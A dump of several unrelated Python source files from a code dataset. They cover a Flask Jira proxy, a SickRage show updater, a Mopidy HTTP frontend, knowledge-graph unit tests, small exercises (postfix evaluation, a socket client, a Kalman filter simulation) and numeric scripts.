os.environ['PROXY']\nos.environ['HTTPS_PROXY'] = os.environ['PROXY']\nserver = os.environ['JIRA_HOST']\napi = '/rest/api/2'\n\napp = Flask(__name__)\nCORS(app)\n\ndef get(url):\n return requests.get(url, auth=(os.environ['JIRA_USERNAME'], os.environ['JIRA_PASSWORD']))\n\ndef post(url, data):\n return requests.post(url, auth=(os.environ['JIRA_USERNAME'], os.environ['JIRA_PASSWORD']), headers={'Accept':'application/json'}, data=data)\n\n@app.route('/')\ndef index():\n return jsonify('')\n\n@app.route(api + '/issue', methods=['POST'])\ndef createIssue():\n print(json.loads(request.data))\n response = post(server + api + '/issue', json.loads(request.data))\n print(response)\n return jsonify(response.json())\n\n@app.route(api + '/issue/')\ndef getIssue(key):\n response = get(server + api + '/issue/' + key)\n return jsonify(response.json())\n\n@app.route(api + '/issue//transitions')\ndef getIssueTransitions(key):\n response = get(server + api + '/issue/' + key + '/transitions')\n return jsonify(response.json())\n\n@app.route(api + '/issue//properties')\ndef getIssuePropertyKeys(key):\n response = get(server + api + '/issue/' + key + '/properties')\n return jsonify(response.json())\n\n@app.route(api + '/issue//properties/')\ndef getIssueProperty(issueKey, propertyKey):\n response = get(server + api + '/issue/' + issueKey + '/properties/' + propertyKey)\n return jsonify(response.json())\n\n@app.route(api + '/search', methods=['GET'])\ndef search():\n jql = request.args.get('jql')\n startAt = request.args.get('startAt') or '0'\n maxResults = request.args.get('maxResults') or '50'\n url = '/search?jql={0}&startAt={1}&maxResults={2}'.format(jql, startAt, maxResults).replace(\"'\", \"\")\n response = get(server + api + url)\n return jsonify(response.json())\n\n@app.route(api + '/project/')\ndef getProject(projectKey):\n url = server + api + '/project/' + projectKey\n print(str(url))\n response = get(str(url))\n print(response.json())\n return jsonify(response.json())\n\n@app.route(api + '/myself', methods=['GET'])\ndef myself():\n expand = '?expand=' + request.args.get('expand') if request.args.get('expand') else ''\n url = '/myself' + expand.replace(\"'\", \"\")\n response = get(server + api + url)\n return jsonify(response.json())\n\nif __name__ == '__main__':\n app.run(host=os.getenv('IP', '127.0.0.1'),port=5000)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"161561719","text":"#%%\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# setting up the equation\ntp = np.array([0.25, 0.5, 0.75, 1])\nyp = np.array([3, 2, -3, 0])\nA = np.zeros((4, 4))\nrhs = np.zeros(4)\nfor i in range(4):\n A[i] = np.sin(1 * np.pi * tp[i]), np.sin(2 * np.pi * tp[i]), \\\n np.sin(3 * np.pi * tp[i]), np.sin(4 * np.pi * tp[i]) # Store one row at a time\n rhs[i] = yp[i]\n\n# Solving the equation\nsol = np.linalg.solve(A, rhs)\nprint('a, b, c, d: ', sol)\n\n# plotting the wave\nt = np.linspace(0, 1, 100)\ny = sol[0] * np.sin(1 * np.pi * t) + sol[1] * np.sin(2 * np.pi * t) + \\\n sol[2] * np.sin(3 * np.pi * t) + sol[3] * np.sin(4 * np.pi * t)\nplt.plot(t, y, 'b', label='wave')\nplt.xlabel('t')\nplt.ylabel('y')\n\n# plotting the initial points\nplt.plot(tp, yp, 'ro', label='data')\nplt.legend(loc='best');\n\n\n# %%\n","sub_path":"engineering-python/linear-algebra-challenge/theirsoln.py","file_name":"theirsoln.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"412397251","text":"# coding=utf-8\n\nimport xml.etree.ElementTree as ET\nimport requests\nimport time\nimport datetime\nimport threading\nimport sickbeard\n\nfrom sickbeard import logger\nfrom sickbeard import ui\nfrom sickbeard import db\nfrom sickbeard import network_timezones\nfrom sickbeard import failed_history\nfrom sickbeard import helpers\nfrom sickrage.helper.exceptions import CantRefreshShowException, CantUpdateShowException, ex\nfrom sickbeard.indexers.indexer_config import INDEXER_TVRAGE\nfrom sickbeard.indexers.indexer_config import INDEXER_TVDB\n\n\nclass ShowUpdater(object): # pylint: disable=too-few-public-methods\n def __init__(self):\n self.lock = threading.Lock()\n self.amActive = False\n\n self.session = helpers.make_session()\n\n def run(self, force=False): # pylint: disable=unused-argument, too-many-locals, too-many-branches, too-many-statements\n\n self.amActive = True\n\n bad_indexer = [INDEXER_TVRAGE]\n update_datetime = datetime.datetime.now()\n update_date = update_datetime.date()\n\n # update_timestamp = calendar.timegm(update_datetime.timetuple())\n update_timestamp = time.mktime(update_datetime.timetuple())\n cache_db_con = db.DBConnection('cache.db')\n result = cache_db_con.select(\"SELECT `time` FROM lastUpdate WHERE provider = 'theTVDB'\")\n if result:\n last_update = int(result[0]['time'])\n else:\n last_update = update_timestamp - 86400\n cache_db_con.action(\"INSERT INTO lastUpdate (provider,`time`) VALUES (?, ?)\", ['theTVDB', last_update])\n\n # refresh network timezones\n network_timezones.update_network_dict()\n\n # sure, why not?\n if sickbeard.USE_FAILED_DOWNLOADS:\n failed_history.trimHistory()\n\n update_delta = update_timestamp - last_update\n\n if update_delta >= 691200: # 8 days ( 7 days + 1 day of buffer time)\n update_file = 'updates_month.xml'\n elif update_delta >= 90000: # 25 hours ( 1 day + 1 hour of buffer time)\n update_file = 'updates_week.xml'\n else:\n update_file = 'updates_day.xml'\n\n # url = 'http://thetvdb.com/api/Updates.php?type=series&time=%s' % last_update\n url = 'http://thetvdb.com/api/%s/updates/%s' % (sickbeard.indexerApi(INDEXER_TVDB).api_params['apikey'], update_file)\n data = helpers.getURL(url, session=self.session, returns='text')\n if not data:\n logger.log(u\"Could not get the recently updated show data from %s. Retrying later. Url was: %s\" % (sickbeard.indexerApi(INDEXER_TVDB).name, url))\n self.amActive = False\n return\n\n updated_shows = []\n try:\n tree = ET.fromstring(data)\n for show in tree.findall(\"Series\"):\n updated_shows.append(int(show.find('id').text))\n except SyntaxError:\n pass\n\n logger.log(u\"Doing full update on all shows\")\n\n pi_list = []\n for cur_show in sickbeard.showList:\n\n if cur_show.indexer in bad_indexer:\n logger.log(u\"Indexer is no longer available for show [ %s ] \" % cur_show.name, logger.WARNING)\n else:\n indexer_name = sickbeard.indexerApi(cur_show.indexer).name\n\n try:\n if indexer_name == 'theTVDB':\n if cur_show.indexerid in updated_shows:\n pi_list.append(sickbeard.showQueueScheduler.action.updateShow(cur_show, True))\n # else:\n # pi_list.append(sickbeard.showQueueScheduler.action.refreshShow(cur_show, True))\n else:\n cur_show.nextEpisode()\n\n if cur_show.should_update(update_date=update_date):\n try:\n pi_list.append(sickbeard.showQueueScheduler.action.updateShow(cur_show, True))\n except CantUpdateShowException as e:\n logger.log(u\"Unable to update show: {0}\".format(str(e)), logger.DEBUG)\n else:\n logger.log(\n u\"Not updating episodes for show \" + cur_show.name + \" because it's last/next episode is not within the grace period.\",\n logger.DEBUG)\n # pi_list.append(sickbeard.showQueueScheduler.action.refreshShow(cur_show, True))\n except (CantUpdateShowException, CantRefreshShowException) as e:\n logger.log(u\"Automatic update failed: \" + ex(e), logger.ERROR)\n\n ui.ProgressIndicators.setIndicator('dailyUpdate', ui.QueueProgressIndicator(\"Daily Update\", pi_list))\n\n cache_db_con.action(\"UPDATE lastUpdate SET `time` = ? WHERE provider=?\", [update_timestamp, 'theTVDB'])\n\n logger.log(u\"Completed full update on all shows\")\n\n self.amActive = False\n\n def __del__(self):\n pass\n","sub_path":"sickbeard/show_updater.py","file_name":"show_updater.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"557954133","text":"from __future__ import unicode_literals\n\nimport json\nimport logging\nimport os\nimport threading\n\nimport pykka\n\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\n\nfrom mopidy import models, zeroconf\nfrom mopidy.core import CoreListener\nfrom mopidy.http import handlers\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpFrontend(pykka.ThreadingActor, CoreListener):\n apps = []\n statics = []\n\n def __init__(self, config, core):\n super(HttpFrontend, self).__init__()\n self.config = config\n self.core = core\n\n self.hostname = config['http']['hostname']\n self.port = config['http']['port']\n self.zeroconf_name = config['http']['zeroconf']\n self.zeroconf_service = None\n self.app = None\n\n def on_start(self):\n threading.Thread(target=self._startup).start()\n self._publish_zeroconf()\n\n def on_stop(self):\n self._unpublish_zeroconf()\n tornado.ioloop.IOLoop.instance().add_callback(self._shutdown)\n\n def _startup(self):\n logger.debug('Starting HTTP server')\n self.app = tornado.web.Application(self._get_request_handlers())\n self.app.listen(self.port,\n self.hostname if self.hostname != '::' else None)\n logger.info(\n 'HTTP server running at http://%s:%s', self.hostname, self.port)\n tornado.ioloop.IOLoop.instance().start()\n\n def _shutdown(self):\n logger.debug('Stopping HTTP server')\n tornado.ioloop.IOLoop.instance().stop()\n logger.debug('Stopped HTTP server')\n\n def on_event(self, name, **data):\n event = data\n event['event'] = name\n message = json.dumps(event, cls=models.ModelJSONEncoder)\n handlers.WebSocketHandler.broadcast(message)\n\n def _get_request_handlers(self):\n request_handlers = []\n\n request_handlers.extend(self._get_app_request_handlers())\n request_handlers.extend(self._get_static_request_handlers())\n\n # Either default Mopidy or user defined path to files\n static_dir = self.config['http']['static_dir']\n if static_dir and not os.path.exists(static_dir):\n logger.warning(\n 'Configured http/static_dir %s does not exist. '\n 'Falling back to default HTTP handler.', static_dir)\n static_dir = None\n if static_dir:\n request_handlers.append((r'/(.*)', handlers.StaticFileHandler, {\n 'path': self.config['http']['static_dir'],\n 'default_filename': 'index.html',\n }))\n else:\n request_handlers.append((r'/', tornado.web.RedirectHandler, {\n 'url': '/mopidy/',\n 'permanent': False,\n }))\n\n logger.debug(\n 'HTTP routes from extensions: %s',\n list((l[0], l[1]) for l in request_handlers))\n return request_handlers\n\n def _get_app_request_handlers(self):\n result = []\n for app in self.apps:\n result.append((\n r'/%s' % app['name'],\n handlers.AddSlashHandler\n ))\n request_handlers = app['factory'](self.config, self.core)\n for handler in request_handlers:\n handler = list(handler)\n handler[0] = '/%s%s' % (app['name'], handler[0])\n result.append(tuple(handler))\n logger.debug('Loaded HTTP extension: %s', app['name'])\n return result\n\n def _get_static_request_handlers(self):\n result = []\n for static in self.statics:\n result.append((\n r'/%s' % static['name'],\n handlers.AddSlashHandler\n ))\n result.append((\n r'/%s/(.*)' % static['name'],\n handlers.StaticFileHandler,\n {\n 'path': static['path'],\n 'default_filename': 'index.html'\n }\n ))\n logger.debug('Loaded static HTTP extension: %s', static['name'])\n return result\n\n def _publish_zeroconf(self):\n if not self.zeroconf_name:\n return\n\n self.zeroconf_http_service = zeroconf.Zeroconf(\n stype='_http._tcp', name=self.zeroconf_name,\n host=self.hostname, port=self.port)\n\n if self.zeroconf_http_service.publish():\n logger.debug(\n 'Registered HTTP with Zeroconf as \"%s\"',\n self.zeroconf_http_service.name)\n else:\n logger.debug('Registering HTTP with Zeroconf failed.')\n\n self.zeroconf_mopidy_http_service = zeroconf.Zeroconf(\n stype='_mopidy-http._tcp', name=self.zeroconf_name,\n host=self.hostname, port=self.port)\n\n if self.zeroconf_mopidy_http_service.publish():\n logger.debug(\n 'Registered Mopidy-HTTP with Zeroconf as \"%s\"',\n self.zeroconf_mopidy_http_service.name)\n else:\n logger.debug('Registering Mopidy-HTTP with Zeroconf failed.')\n\n def _unpublish_zeroconf(self):\n if self.zeroconf_http_service:\n self.zeroconf_http_service.unpublish()\n\n if self.zeroconf_mopidy_http_service:\n self.zeroconf_mopidy_http_service.unpublish()\n","sub_path":"mopidy/http/actor.py","file_name":"actor.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"390246195","text":"import unittest, json\nfrom etk.knowledge_graph import KGSchema\nfrom etk.etk import ETK\nfrom etk.etk_exceptions import KgValueError\nfrom datetime import date, datetime\nfrom etk.ontology_api import Ontology\nfrom etk.ontology_namespacemanager import DIG\n\n\nclass TestKnowledgeGraph(unittest.TestCase):\n def setUp(self):\n sample_doc = {\n \"projects\": [\n {\n \"name\": \"etk\",\n \"description\": \"version 2 of etk, implemented by Runqi12 Shao, Dongyu Li, Sylvia lin, Amandeep and others.\",\n \"members\": [\n \"dongyu\",\n \"amandeep\",\n \"sylvia\",\n \"Runqi12\"\n ],\n \"date\": \"2007-12-05\",\n \"place\": \"columbus:georgia:united states:-84.98771:32.46098\",\n \"s\": \"segment_test_1\"\n },\n {\n \"name\": \"rltk\",\n \"description\": \"record linkage toolkit, implemented by Pedro, Mayank, Yixiang and several students.\",\n \"members\": [\n \"mayank\",\n \"yixiang\"\n ],\n \"date\": [\"2007-12-05T23:19:00\"],\n \"cost\": -3213.32,\n \"s\": \"segment_test_2\"\n }\n ]\n }\n kg_schema = KGSchema(json.load(open('etk/unit_tests/ground_truth/test_config.json')))\n\n etk = ETK(kg_schema)\n self.doc = etk.create_document(sample_doc)\n\n def test_add_segment_kg(self) -> None:\n sample_doc = self.doc\n segments = sample_doc.select_segments(\"projects[*].s\")\n sample_doc.kg.add_value(\"segment\", segments)\n expected_segments = [\"segment_test_1\", \"segment_test_2\"]\n self.assertTrue(sample_doc.kg.value[\"segment\"][0][\"key\"] in expected_segments)\n self.assertTrue(sample_doc.kg.value[\"segment\"][1][\"key\"] in expected_segments)\n self.assertTrue('provenances' in sample_doc.value)\n provenances = sample_doc.value['provenances']\n self.assertTrue(len(provenances) == 2)\n self.assertTrue(provenances[0]['reference_type'] == 'location')\n\n def test_KnowledgeGraph(self) -> None:\n sample_doc = self.doc\n\n try:\n sample_doc.kg.add_value(\"developer\", json_path=\"projects[*].members[*]\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_date\", json_path=\"projects[*].date[*]\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_add_value_date\",\n value=[date(2018, 3, 28), {}, datetime(2018, 3, 28, 1, 1, 1)])\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_location\", json_path=\"projects[*].place\")\n except KgValueError:\n pass\n\n try:\n sample_doc.kg.add_value(\"test_non_empty\", value=\"\")\n sample_doc.kg.add_value(\"test_non_empty\", value=\"non-empty\")\n sample_doc.kg.add_value(\"test_empty\", value=\"\", keep_empty=True)\n sample_doc.kg.add_value(\"test_empty\", value=\"empty\", keep_empty=True)\n except KgValueError:\n pass\n\n expected_developers = [\n {\n \"value\": \"dongyu\",\n \"key\": \"dongyu\"\n },\n {\n \"value\": \"amandeep\",\n \"key\": \"amandeep\"\n },\n {\n \"value\": \"sylvia\",\n \"key\": \"sylvia\"\n },\n {\n \"value\": \"Runqi12\",\n \"key\": \"runqi12\"\n },\n {\n \"value\": \"mayank\",\n \"key\": \"mayank\"\n },\n {\n \"value\": \"yixiang\",\n \"key\": \"yixiang\"\n }\n ]\n\n expected_date = [\n {\n \"value\": \"2007-12-05T00:00:00\",\n \"key\": \"2007-12-05T00:00:00\"\n },\n {\n \"value\": \"2007-12-05T23:19:00\",\n \"key\": \"2007-12-05T23:19:00\"\n }\n ]\n\n expected_add_value_date = [\n {\n \"value\": \"2018-03-28\",\n \"key\": \"2018-03-28\"\n },\n {\n \"value\": \"2018-03-28T01:01:01\",\n \"key\": \"2018-03-28T01:01:01\"\n }\n ]\n\n expected_location = [\n {\n \"value\": \"columbus:georgia:united states:-84.98771:32.46098\",\n \"key\": \"columbus:georgia:united states:-84.98771:32.46098\"\n }\n ]\n\n expected_non_empty = [{\"key\": \"non-empty\", \"value\": \"non-empty\"}]\n expected_empty = [{\"key\": \"\", \"value\": \"\"}, {\"key\": \"empty\", \"value\": \"empty\"}]\n\n self.assertEqual(expected_developers, sample_doc.kg.value[\"developer\"])\n self.assertEqual(expected_date, sample_doc.kg.value[\"test_date\"])\n self.assertEqual(expected_location, sample_doc.kg.value[\"test_location\"])\n self.assertEqual(expected_add_value_date, sample_doc.kg.value[\"test_add_value_date\"])\n self.assertEqual(expected_non_empty, sample_doc.kg.value[\"test_non_empty\"])\n self.assertEqual(expected_empty, sample_doc.kg.value[\"test_empty\"])\n\n def test_add_value_empty(self):\n self.doc.kg.add_value('test_zero', 0.0)\n self.assertEqual(self.doc.kg.value['test_zero'][0]['value'], 0.0)\n\n\nclass TestKnowledgeGraphWithOntology(unittest.TestCase):\n def setUp(self):\n ontology_content = '''\n @prefix : .\n @prefix owl: .\n @prefix rdf: .\n @prefix rdfs: .\n @prefix schema: .\n @prefix xsd: .\n :Person a owl:Class ;\n rdfs:subClassOf :Actor, :Biological_Object ;\n :common_properties :label, :title, :religion ; .\n :has_name a owl:DatatypeProperty ;\n schema:domainIncludes :Person ;\n schema:rangeIncludes xsd:string ; .\n :has_child a owl:ObjectProperty ;\n schema:domainIncludes :Person ;\n schema:rangeIncludes :Person ; .\n '''\n ontology = Ontology(ontology_content, validation=False, include_undefined_class=True, quiet=True)\n kg_schema = KGSchema(ontology.merge_with_master_config(dict()))\n etk = ETK(kg_schema=kg_schema, ontology=ontology, generate_json_ld=True)\n etk2 = ETK(kg_schema=kg_schema, ontology=ontology, generate_json_ld=False)\n self.doc = etk.create_document(dict(), doc_id='http://xxx/1', type_=[DIG.Person.toPython()])\n self.doc2 = etk2.create_document(dict(), doc_id='http://xxx/2', type_=[DIG.Person.toPython()])\n\n def test_valid_kg_jsonld(self):\n kg = self.doc.kg\n self.assertIn('@id', kg._kg)\n self.assertEqual('http://xxx/1', kg._kg['@id'])\n self.assertIn('@type', kg._kg)\n self.assertIn(DIG.Person.toPython(), kg._kg['@type'])\n\n def test_valid_kg(self):\n kg = self.doc2.kg\n self.assertNotIn('@id', kg._kg)\n self.assertNotIn('@type', kg._kg)\n\n def test_add_value_kg_jsonld(self):\n kg = self.doc.kg\n field_name = kg.context_resolve(DIG.has_name)\n self.assertEqual('has_name', field_name)\n kg.add_value(field_name, 'Jack')\n self.assertIn({'@value': 'Jack'}, kg._kg[field_name])\n field_child = kg.context_resolve(DIG.has_child)\n self.assertEqual('has_child', field_child)\n child1 = 'http://xxx/2'\n child2 = {'@id': 'http://xxx/3', 'has_name': 'Daniels', '@type': [DIG.Person],\n '@context': {'has_name': DIG.has_name.toPython()}}\n kg.add_value(field_child, child1)\n kg.add_value(field_child, child2)\n self.assertIn({'@id': 'http://xxx/2'}, kg._kg[field_child])\n\n def test_add_value_kg(self):\n kg = self.doc2.kg\n\n field_name = kg.context_resolve(DIG.has_name)\n\n self.assertEqual('has_name', field_name)\n kg.add_value(field_name, 'Jack')\n self.assertIn({'value': 'Jack', \"key\": \"jack\"}, kg._kg[field_name])\n","sub_path":"etk/unit_tests/test_knowledge_graph.py","file_name":"test_knowledge_graph.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"202997893","text":"#filter함수 사용 예시\n#소수만 뽑아내는 함수\n#filter(특정조건의 값을 추출하는 함수, 반복가능한 자료)\n\ndef getPrime(x):\n if x % 2 == 0:\n return\n\n for i in range(3, int(x/2), 2):\n if x % i == 0:\n break\n else:\n return x\n\nlist_data = [5,117,119,123453,11113]\nret = filter(getPrime,list_data)\nprint(list(ret))\n","sub_path":"071.filter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"332432251","text":"# Evaluation of postfix expression using Stack\nclass Stack:\n\n def __init__(self):\n self.items = []\n\n def push(self, item):\n self.items.append(item)\n\n def pop(self):\n if self.items:\n return self.items.pop()\n\n return None\n\n def peek(self):\n if self.items:\n return self.items[-1]\n\n return None\n\n\ndef evaluate_postfix(expr):\n\n stack = Stack()\n for i in range(len(expr)):\n\n # Push operand to stack\n # To convert expr[i] to digit subtract\n # '0' from expr[i].\n if is_operand(expr[i]):\n stack.push(ord(expr[i]) - ord(\"0\"))\n\n else:\n\n # Operator encountered\n # Pop two elements (operands) from stack\n # Perform operation and push result to stack\n op2 = stack.pop()\n op1 = stack.pop()\n result = perform(expr[i], op1, op2)\n stack.push(result)\n\n return stack.peek()\n\n\ndef is_operand(char):\n\n # Check for operand. If character is a digit\n # then it is an operand\n return char.isdigit()\n\n\ndef perform(operator, val1, val2):\n\n if operator == '+':\n return val1 + val2\n\n if operator == '-':\n return val1 - val2\n\n if operator == '*':\n return val1 * val2\n\n if operator == '/':\n return val1 / val2\n\n\nif __name__ == \"__main__\":\n\n test_expr = \"34*52*-9+\"\n print(evaluate_postfix(test_expr))\n","sub_path":"infix-prefix-postfix/evaluate_postfix.py","file_name":"evaluate_postfix.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"454887507","text":"from socket import *\nimport random\nimport sys\n\n#Test\ndef connect ():\n\t\"\"\"\n\tCreates a socket and connects to paris.cs.utexas.edu on port 35601.\n\tThis can be changed if necessary to connect somehwere else. Will exit\n\twith error code -1 if connect fails.\n\n\tReturns: \n\t\tConnected socket\n\t\"\"\"\n\tserverName = 'paris.cs.utexas.edu'\n\tserverPort = 35601\n\tsock = socket(AF_INET, SOCK_STREAM)\n\ttry:\n\t\tsock.connect((serverName, serverPort))\n\texcept:\n\t\tprint(\"Connection failed\")\n\t\texit(-1)\n\treturn sock\n\ndef send (c, sock, usernum):\n\t\"\"\"\n\tConstructs the correct string to send to the remote server and calls\n\tsock.send to send it over. If send fails, will exit with error code -1.\n\n\tArgs:\n\t\tc: An array with client IP [0] and port number [1].\n\t\tsock: A reference to the connected client socket.\n\t\tusernum: A randomly generated user number.\n\t\"\"\"\n\tsendstr = 'ex0 ' + '128.83.144.56-35601 ' + c[0] + '-' + str(c[1]) + ' ' + str(usernum) + ' D.B.Durbin' + '\\n'\n\ttry:\n\t\tsock.send(str.encode(sendstr))\n\texcept:\n\t\tprint(\"Error in sending\")\n\t\texit(-1)\n\ndef receive (sock) :\n\t\"\"\"\n\tReceives two lines from server to initial send request. Will exit with error\n\tcode -1 if either receive fails.\n\n\tArgs:\n\t\tsock: A reference to connected socket.\n\n\tReturns:\n\t\trline1: First line of received message.\n\t\trline2: Second line of received message.\n\t\"\"\"\n\ttry:\n\t\trline1 = sock.recv(1024).decode()\n\texcept:\n\t\tprint (\"Failed to receive first line\")\n\t\texit(-1)\n\ttry:\n\t\trline2 = sock.recv(1024).decode()\n\texcept:\n\t\tprint (\"Failed to receive second line\")\n\t\texit(-1)\n\treturn rline1, rline2 \n\ndef decode_receive (line2, usernum, sock):\n\t\"\"\"\n\tDecodes second line of received statement from server. Checks for OK \n\tand that the usernum +1 is returned by calling the .split() method on line2.\n\tIt will then call send_ack if these conditions are met. Otherwise, exits\n\twith error code -1.\n\n\tArgs: \n\t\tline2: Second received line from receive method. \n\t\tusernum: Randomly generated usernum\n\t\tsock: Reference to connected socket.\n\t\"\"\"\n\tlist_l2 = line2.split()\n\t#Have to check for OK and the returned number is equal to usernum + 1\n\tif ((list_l2[0] == \"OK\") and (int(list_l2[1]) == usernum+1)):\n\t\tprint (int(list_l2[3]))\n\t\tsend_ack(usernum, line2, sock)\n\telse: \n\t\tprint (\"There was an error: \" + line2)\n\t\texit(-1)\n\ndef send_ack (usernum, line2, sock):\n\t\"\"\"\n\tSends acknowledgement to server after determining the server responded\n\twith a properly formatted response. Called directly from decode_receive.\n\tBuilds a send string by splitting line2. Will exit with -1 if send fails.\n\t\"\"\"\n\tlist_l2 = line2.split()\n\tack_string = \"ex0 \" + str((list_l2[1])) + \" \" + str((int(list_l2[3]) + 1)) + '\\n'\n\ttry:\n\t\tsock.send(str.encode((ack_string)))\n\texcept:\n\t\tprint(\"Sending failure of ack line\")\n\t\texit(-1)\n\ndef receieve_ack (sock) :\n\t\"\"\"\n\tReceives acknoledgement from server. Splits the line and makes sure OK \n\twas received. Prints the recieved line if OK received, otherwises prints \n\tand error message.\n\t\"\"\"\n\tackline = sock.recv(1024).decode()\n\tack_split = ackline.split()\n\tif (ack_split[len(ack_split) -2] == \"OK\"):\n\t\tprint(int(ack_split[len(ack_split) - 1]))\n\telse :\n\t\tprint (\"Error in received ack: \" + ackline)\n\ndef main():\n\t\"\"\"\n\tThis follows typical Python by calling methods. Begins with generating\n\trandom int from 0-9000 for the usernum. The calls connect, gets the new \n\tclient socket's IP and Port, calls send, decodes the response, checks if it's\n\tok and then sends an ack back and receives the server ack. Closes the socket at \n\tthe end.\n\t\"\"\"\n\tusernum = random.randint(0,9000)\n\tsock = connect()\n\tc = sock.getsockname()\n\tsend (c,sock,usernum)\n\trline1, rline2 = receive (sock)\n\tdecode_receive(rline2, usernum, sock)\n\treceieve_ack(sock)\n\tsock.close()\n\nmain()","sub_path":"ex0.py","file_name":"ex0.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"205232928","text":"import numpy as np\nimport math\nfrom numpy.linalg import inv\nimport matplotlib.pyplot as plt\n\n# Local calls to own modules\nimport random\n\ndef GAUSS(SIG):\n\tSUM=0\n\tfor j in range(1,7):\n\t\t# THE NEXT STATEMENT PRODUCES A UNIF. DISTRIBUTED NUMBER FROM -0.5 and 0.5\n\t\tIRAN=random.uniform(-0.5, 0.5)\n\t\tSUM=SUM+IRAN\n\t\t# In this case we have to multiply the resultant random variable by the square root of 2,\n\tX=math.sqrt(2)*SUM*SIG\n\treturn (X)\n\t\ndef GAUSS_PY(SIG):\n\tX=(random.uniform(-3.0,3.0))*SIG\n\treturn (X)\t\n\ndef f1(x1,x2,t):\n\tdx1dt = x2\n\treturn (dx1dt)\n\ndef f2(x1,x2,t):\n\tdx2dt = (0.0034*G*x2*x2*math.exp(-x1/22000.0)/(2.0*BETAH))-G\n\treturn (dx2dt)\n\ndef PROJECT(TS,XP,XDP,BETAP,HP):\n\tT=0.\n\tX=XP\n\tXD=XDP\n\tBETA=BETAP\n\tH=HP\n\twhile (T<=(TS-.0001)):\n\t\tXDD=.0034*32.2*XD*XD*math.exp(-X/22000.)/(2.*BETA)-32.2\n\t\tXD=XD+H*XDD\n\t\tX=X+H*XD\n\t\tT=T+H\n\tXH=X\n\tXDH=XD\n\tXDDH=XDD\n\treturn [XH,XDH]\n\nt=[]\nx1=[]\nxs=[]\nres =[]\nx1_hat=[]\nx1dot=[]\nx1dot_hat=[]\nxs=[]\nxddot_hat=[]\nx1_hat_ERR=[]\nsp11=[]\nsp11n=[]\nx1dot_hat_ERR=[]\nsp22=[]\nsp22n=[]\nbeta_hat_ERR = []\nsp33=[]\nsp33n=[]\nxddot_hat_ERR=[]\nx2ddold =[]\nk1 =[]\nk2 =[]\n\nTS=.1\nXH=0\nXDH=0\nXDDH=0\nSIGMA_NOISE=25.\nX1=200000.\nX1D=-6000.\nBETA=500.\nBETAH=800.\nXH=200025.\nXDH=-6150.\nTS=0.1\nTF=30.\n\n'''\nAs the object descends in altitude, there is more drag, and the object becomes\nmore observable from a filtering point of view. However, because there is no\nprocess noise the filter gains will go to zero. This means that the filter will\nstop paying attention to the measurements (i.e., when the ballistic coefficient \nis most observable) and hangoff error will result, as can be seen in Fig. 8.5. \nFinally, process noise was added to the extended Kalman filter.\n'''\nPHIS=3000.\nT=0.\nS=0.\nH = 0.001\nG = 32.2\nrk =0\n\np_11 = SIGMA_NOISE*SIGMA_NOISE\t# Error in the altitude\np_22 = 150*150\t\t\t\t\t# Error in the velocity\np_33 = 300*300\t\t\t\t\t# Error in BETA parameter\n\nP = np.matrix([[p_11, 0, 0],[0, p_22, 0], [0, 0, p_33]])\nI = np.matrix([[1,0,0],[0,1,0], [0,0,1]])\n\nHMAT = np.matrix([[1, 0, 0]])\nR = np.matrix([[SIGMA_NOISE**2]])\n\nH = TS\ndt = H\nwhile (T <= 30.0):\n\tk11 = dt*f1(X1,X1D,T)\n\tk21 = dt*f2(X1,X1D,T)\n\tk12 = dt*f1(X1+0.5*k11,X1D+0.5*k21,T+0.5*dt)\n\tk22 = dt*f2(X1+0.5*k11,X1D+0.5*k21,T+0.5*dt)\n\tk13 = dt*f1(X1+0.5*k12,X1D+0.5*k22,T+0.5*dt)\n\tk23 = dt*f2(X1+0.5*k12,X1D+0.5*k22,T+0.5*dt)\n\tk14 = dt*f1(X1+k13,X1D+k23,T+dt)\n\tk24 = dt*f2(X1+k13,X1D+k23,T+dt)\n\tX1 = X1 + (k11+2*k12+2*k13+k14)/6\n\tX1D = X1D + (k21+2*k22+2*k23+k24)/6\n\tT = T+dt\n\tS = S+H;\n\t#print (T, S)\n\t# this step is here so that the discritezation of the Riccati equations takes the correct\n\t# values of the output. Note that H=0.0001 but TS=0.1.\n\tif S>=(TS-.00001):\n\t\tS=0.;\n\t\tRHOH = 0.0034*math.exp(-XH/22000.0)\n\t\tF21 =-32.2*RHOH*XDH*XDH/(44000.0*BETAH)\n\t\tF22 = RHOH*32.2*XDH/BETAH\n\t\tF23 =-32.2*RHOH*XDH*XDH/(2.0*BETAH*BETAH)\n\n\t\t\n\t\tF = np.matrix([[0, 1, 0],[F21, F22, F23],[0, 0, 0]])\n\t\t#PHIK = I + TS*F\n\t\tF2 = F*F\n\t\tF3 = F*F*F\n\t\tF4= F*F*F*F\n\t\t\n\t\tITERM =4\n\t\tif ITERM == 2:\n\t\t\tPHI = I + TS*F\n\t\tif ITERM == 3:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2\n\t\tif ITERM == 4:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2 + F3*(TS/6)**3\n\t\tif ITERM == 5:\n\t\t\tPHI = I + TS*F + F2*(TS/2)**2 + F3*(TS/6)**3 + F4*(TS/24)**4\n\t\t\t\n\t\tq_22 